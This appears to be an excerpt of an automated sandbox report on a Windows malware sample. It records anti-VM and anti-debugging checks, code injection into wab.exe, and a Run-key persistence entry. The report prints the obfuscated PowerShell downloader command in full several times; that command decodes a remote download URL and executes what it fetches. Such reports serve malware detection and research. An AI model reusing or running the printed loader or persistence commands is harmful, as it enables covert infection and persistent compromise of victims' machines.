Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591110	Jump to behavior

Source: FTSKIaM.exe, 00000011.00000002.2201367521.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1521192119.000001A4682BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1522809392.000001A468530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FTSKIaM.exe, 00000011.00000002.2201367521.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A3270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllto

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 11_2_022F7818 CheckRemoteDebuggerPresent,

11_2_022F7818

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_0084DAAC LdrInitializeThunk,

9_2_0084DAAC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 17_2_00A11AE4 GetProcessHeap,HeapFree,

17_2_00A11AE4

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A132C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		17_2_00A132C0
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A13450 SetUnhandledExceptionFilter,		17_2_00A13450

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 22FF808			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
